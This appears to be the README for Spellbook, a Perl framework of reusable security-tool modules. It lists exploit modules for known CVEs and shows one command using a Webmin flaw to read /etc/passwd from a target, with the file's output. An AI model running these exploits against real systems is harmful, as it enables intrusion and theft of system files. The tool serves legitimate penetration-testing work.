A framework for rapid development of reusable security tools
Spellbook uses FBP: "In computer programming, flow-based programming (FBP) is a programming paradigm that defines applications as networks of "black box" processes, which exchange data across predefined connections by message passing, where the connections are specified externally to the processes. These black box processes can be reconnected endlessly to form different applications without having to be changed internally. FBP is thus naturally component-oriented." [1]
The main focus of this “micro-framework” is turn in reality the rapid development of security tools using reusable patterns of FBP.
"Third clark law: any sufficiently advanced technology is indistinguishable from magic" - that's why this project is called spellbook.
# Download
$ git clone https://github.com/htrgouvea/spellbook && cd spellbook
# Install libs and dependencies
$ cpanm --installdeps .
Spellbook v0.3.3
Core Commands
==============
Command Description
------- -----------
-s, --search List modules, you can filter by category
-m, --module Set a module to use
-h, --help To see help menu of a module
# Searching for exploits
$ ./spellbook.pl --search advisory
Module: Advisory::CVE_2017_5487
Description: Read usernames leaked on WordPress API
=================================================
Module: Advisory::CVE_2006_3392
Description: Read arbitrary files for servers running Webmin before 1.290 and Usermin before 1.220
=================================================
Module: Advisory::CVE_2016_10045
Description: PHPMailer < 5.2.20 Remote Code Execution PoC 0day Exploit (CVE-2016-10045) (Bypass of the CVE-2016-1033 patch)
=================================================
Module: Advisory::CVE_2021_41773
Description: Exploit path Traversal or RCE in Apache HTTP Server 2.4
=================================================
Module: Advisory::CVE_2023_29489
Description: Exploit for cPanel Reflected XSS - CVE-2023-29489
=================================================
[...]
# Using an exploit
$ perl spellbook.pl -m Advisory::CVE_2006_3392 --help
Advisory::CVE_2006_3392
=======================
-h, --help See this menu
-t, --target Define a target
-f, --file Define a file to read
$ perl spellbook.pl -m Advisory::CVE_2006_3392 -t http://172.30.0.15:10000/ -f /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
[...]
If you are interested in developing new modules, a good start point is to read the development guide.
$ docker build -t spellbook .
$ docker run -ti --rm spellbook --search exploits
Your contributions and suggestions are heartily ♥ welcome. See here the contribution guidelines. Please, report bugs via issues page and for security issues, see here the security policy. (✿ ◕‿◕)
This work is licensed under MIT License.